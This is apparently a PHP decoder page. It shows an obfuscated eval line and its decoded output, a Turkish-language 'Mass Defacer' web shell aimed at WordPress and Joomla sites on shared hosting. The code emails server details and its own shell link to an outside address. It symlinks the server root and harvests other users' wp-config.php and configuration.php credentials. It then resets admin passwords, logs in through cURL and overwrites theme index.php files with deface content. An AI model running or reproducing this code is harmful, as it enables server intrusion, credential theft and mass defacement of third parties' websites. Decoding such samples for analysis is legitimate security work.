Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\..
Decoded Output download
?><?php
$kime="[email protected]";
$baslik="TC Server Avcisi V1.0";
$H4CK4L="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."
";
$H4CK4L.="Server Admin : ".$_SERVER['SERVER_ADMIN']."
";
$H4CK4L.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."
";
$H4CK4L.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."
";
$H4CK4L.="Avlanan Site : " .$_SERVER['HTTP_HOST']."
";
mail($kime, $baslik, $H4CK4L);
error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
return trim($ar1[0]);
}
function randomt() {
$chars = "abcdefghijkmnopqrstuvwxyz023456789";
srand((double)microtime()*1000000);
$i = 0;
$pass = '';
while ($i <= 7) {
$num = rand() % 33;
$tmp = substr($chars, $num, 1);
$pass = $pass . $tmp;
$i++;
}
return $pass;
}
function index_changer_wp($conf, $content) {
$output = '';
$dol = '$';
$go = 0;
$username = entre2v2($conf,"define('DB_USER', '","');");
$password = entre2v2($conf,"define('DB_PASSWORD', '","');");
$dbname = entre2v2($conf,"define('DB_NAME', '","');");
$prefix = entre2v2($conf,$dol."table_prefix = '","'");
$host = entre2v2($conf,"define('DB_HOST', '","');");
$link=mysql_connect($host,$username,$password);
if($link) {
mysql_select_db($dbname,$link) ;
$dol = '$';
$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = 'e643c1c13d227f84703cec754be756d2' WHERE `ID` = 1");
} else {
$output.= "[-] DB Hata :(<br />";
}
if($req1) {
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
$data = mysql_fetch_array($req);
$template = $data["option_value"];
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
$data = mysql_fetch_array($req);
$current_theme = $data["option_value"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/wp-login.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
$pos = strpos($buffer,"action=logout");
if($pos === false) {
$output.= "[-] Giri Basarisiz<br />";
} else {
$output.= "[+] Giri Basarili :)<br />";
$go = 1;
}
if($go) {
$cond = 0;
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
if(substr_count($_file,"/index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] updating index.php Error<br />";
} else {
$output.= "[+] index.php Updated Successfuly<br />";
$hk = explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond = 1;
}
} else {
$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
if(substr_count($_file,"index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] index.php Hata !<br />";
} else {
$output.= "[+] index.php Yklendi. :)<br />";
$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
$cond = 1;
}
} else {
$output.= "[-] index.php Temaya Yuklenemiyor<br />";
}
}
}
} else {
$output.= "[-] DB Hata :(<br />";
}
global $base_path;
unlink($base_path.'COOKIE.txt');
return array('cond'=>$cond, 'output'=>$output);
}
function index_changer_joomla($conf, $content, $domain) {
$doler = '$';
$username = entre2v2($conf, $doler."user = '", "';");
$password = entre2v2($conf, $doler."password = '", "';");
$dbname = entre2v2($conf, $doler."db = '", "';");
$prefix = entre2v2($conf, $doler."dbprefix = '", "';");
$host = entre2v2($conf, $doler."host = '","';");
$co=randomt();
$site_url = "http://".$domain."/administrator";
$output = '';
$cond = 0;
$link=mysql_connect($host, $username, $password);
if($link) {
mysql_select_db($dbname,$link) ;
$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = 'e643c1c13d227f84703cec754be756d2', `usertype` = 'Super Administrator', `block` = 0");
$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
} else {
$output.= "[-] DB Hata :(<br />";
}
if($req1){
if ($req) {
$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];
$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
if($return && $hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_REFERER, $url2);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=tolizuga&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Giris Basarisiz<br />";
} else {
$output.= "[+] Giris Basarili :)<br />";
}
}
if($pos){
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if($hidden2) {
$output.= "[+] index.php Bulundu Reis.<br />";
} else {
$output.= "[-] index.php Bulunamadi Reis.<br />";
}
}
if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<dd class="message message">');
$cond = 0;
if($pos === false) {
$output.= "[-] index.php Hata A.Q :(<br />";
} else {
$output.= "[+] index.php Kayit Edildi Hadi yisiN.<br />";
$cond = 1;
}
}
}
else {
$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
if($hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Giris Baarisiz.<br />";
} else {
$output.= "[+] Giris Basarili !<br />";
}
}
if($pos) {
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
if($hidden2) {
$output.= "[+] index.php Bulunamadi A.Q :(<br />";
} else {
$output.= "[-] index.php Tema ditr Bulunamad<br />";
}
}
if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<dd class="message message fade">');
$cond = 0;
if($pos === false) {
$output.= "[-] index.php Sablonu Ailamadi !<br />";
} else {
$output.= "[+] index.php Sablonu Basar ile Kayt Edildi<br />";
$cond = 1;
}
}
}
} else {
$output.= "[-] DB Hata A.Q :(<br />";
}
global $base_path;
unlink($base_path.$co);
return array('cond'=>$cond, 'output'=>$output);
}
function exec_mode_1($def_url, $hacker) {
@mkdir('sym',0777);
$wr = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
$fp = @fopen ('sym/.htaccess','w');
fwrite($fp, $wr);
@symlink('/','sym/root');
$dominios = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
$out[1] = array_unique($out[1]);
$numero_dominios = count($out[1]);
echo "Toplam Domain: $numero_dominios <br><br />";
$def = file_get_contents($def_url);
$def = urlencode($def);
$dd = 'ToLiZuGa';
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
$output = fopen('defaced.html', 'a+');
$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>
';
$j = 1;
$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
for($i = $st; $i <= $numero_dominios; $i++)
{
$domain = $out[1][$i];
$dono_arquivo = @fileowner("/etc/valiases/".$domain);
$infos = @posix_getpwuid($dono_arquivo);
if($infos['name']!='root') {
$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {
echo '<td align="center"><span class="red">Basarsz</span></td>';
}
echo '</tr>';
}
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">Basarsz</span></td>';
}
echo '</tr>';
}
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config03 && preg_match('/DB_NAME/i',$config03)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config03, $dd);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED A.Q</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
}
}
echo '</table>
';
echo '<hr/>';
echo 'Toplam Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
echo '<a href="defaced.html" target="_blank">Deface Edilen Siteler A.Q. ( Tikla )</a><br />';
if($_SESSION['count1']+$_SESSION['count2'] > 0){
echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
}
}
function exec_mode_2($def_url) {
$domains = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
$out = array_unique($out[1]);
$num = count($out);
print("Toplam Domain: $num<br><br />");
$def = file_get_contents($def_url);
$def = urlencode($def);
$output = fopen('defaced.html', 'a+');
$defaced = '';
$count1 = 0;
$count2 = 0;
echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>
';
$j = 1;
$map = array();
foreach($out as $d) {
$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
$map[$info['name']] = $d;
}
$dt = 'tolizuga';
mkdir('plsym',0777);
file_put_contents('plsym/plsym.cc', base64_decode($dt));
chmod('plsym/plsym.cc', 0755);
$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cc
AddHandler cgi-script .cc
AddHandler cgi-script .cc";
$fp = @fopen ('plsym/.htaccess','w');
fwrite($fp, $wr);
fclose($fp);
$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
unlink('plsym/plsym.cc');
$data = file_get_contents($url);
preg_match_all('/<a href="(.+)">/', $data, $match);
unset($match[1][0]);
$i = 1;
foreach($match[1] as $m)
{
$mz = explode('##',urldecode($m));
$config01 = '';
$config02 = '';
if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
}
if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
}
$domain = $map[$mz[0]];
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</td></a>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">Basarsz</span></td>';
}
echo '</tr>';
}
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">Basarsz A.Q</span></td>';
}
echo '</tr>';
}
}
echo '</table>
';
echo '<hr/>';
echo 'Toplam Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
echo '<a href="defaced.html" target="_blank">Deface Edilen Siteler A.Q. ( Tikla )</a><br />';
if($count1+$count2 > 0){
echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
}
}
function exec_mode_3($def_url) {
$domains = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
$out = array_unique($out[1]);
$num = count($out);
print("Toplam Domain: $num<br><br />");
$def = file_get_contents($def_url);
$def = urlencode($def);
$output = fopen('defaced.html', 'a+');
$defaced = '';
$count1 = 0;
$count2 = 0;
echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>
';
$j = 1;
$map = array();
foreach($out as $d) {
$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
$map[$info['name']] = $d;
}
$dt = 'tolizuga';
mkdir('plsym',0777);
file_put_contents('plsym/data.txt', $_POST['man_data']);
file_put_contents('plsym/plsym.cc', base64_decode($dt));
chmod('plsym/plsym.cc', 0755);
$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cc
AddHandler cgi-script .cc
AddHandler cgi-script .cc";
$fp = @fopen ('plsym/.htaccess','w');
fwrite($fp, $wr);
fclose($fp);
$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
unlink('plsym/plsym.cc');
$data = file_get_contents($url);
preg_match_all('/<a href="(.+)">/', $data, $match);
unset($match[1][0]);
$i=1;
foreach($match[1] as $m)
{
$mz = explode('##',urldecode($m));
$config01 = '';
$config02 = '';
if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
}
if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
}
$domain = $map[$mz[0]];
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</td></a>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">Basarsz</span></td>';
}
echo '</tr>';
}
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">Basarsz</span></td>';
}
echo '</tr>';
}
}
echo '</table>
';
echo '<hr/>';
echo 'Toplam Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
echo '<a href="defaced.html" target="_blank">Deface Edilen Siteler A.Q. ( Tikla )</a><br />';
if($count1+$count2 > 0){
echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
}
}
echo '<!DOCTYPE html>
<html>
<head>
<title>By ToLiZuGa( Mass Defacer )</title>
<link href="http://fonts.googleapis.com/***?family=Orbitron:700" rel="stylesheet" type="text/***">
<style type="text/***">
table,body {
background-color: #ffffff;
color:white;
font-family: "Trebuchet MS",Arial;
background-attachment:fixed;
margin:0;
padding:0;
background-image: url(http://i.hizliresim.com/6RpYB3.png);
background-repeat: repeat;
background-position: center top;
}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
input[type="submit"]:hover{color:SeaShell;}
input[type="text"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
.style1 {color: #FF0000}
.style2 {color: #FFFFFF}
.style4 {
color: #00ff00;
text-align: center;
text-shadow: 6px 6px 6px black;
font-weight: bold;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-style: italic;
}
</style>
<script type="text/************">
function change() {
if(document.getElementById(\'rcd\').checked == true) {
document.getElementById(\'tra\').style.display = \'\';
} else {
document.getElementById(\'tra\').style.display = \'none\';
}
}
function hide() {
document.getElementById(\'tra\').style.display = \'none\';
}
</script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;"> <a href="http://i.hizliresim.com/ek735m.png" target="_blank"><img src="http://i.hizliresim.com/ek735m.png" width=451 height="140" border="0"></a></h3>
</div>
<h2 class="style4"><span class="style1">Wordpress</span> <span class="style2">ve Joomla</span> <span class="style1">Mass</span> <span class="style2">Defacer</span></h2>
';
if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
echo '<div align="center">
<form action="" method="post">
<table>
<tr><td><input type="radio" value="1" name="mode" checked="checked" onClick="hide();"></td><td>using /etc/named.conf ('.(is_READABLE('/etc/named.conf')?'<span class="green">Okunabilir</span>':'<span class="red">OkunaBilir Degil</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" onClick="hide();"></td><td>using /etc/passwd ('.(is_READABLE('/etc/passwd')?'<span class="green">Okunabilir</span>':'<span class="red">OkunaBilir Degil</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" id="rcd" onClick="change();"></td><td>manual copy of /etc/passwd</td></tr>
<tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
</table>
<br />
<input type="hidden" name="form_action" value="1">
<table>
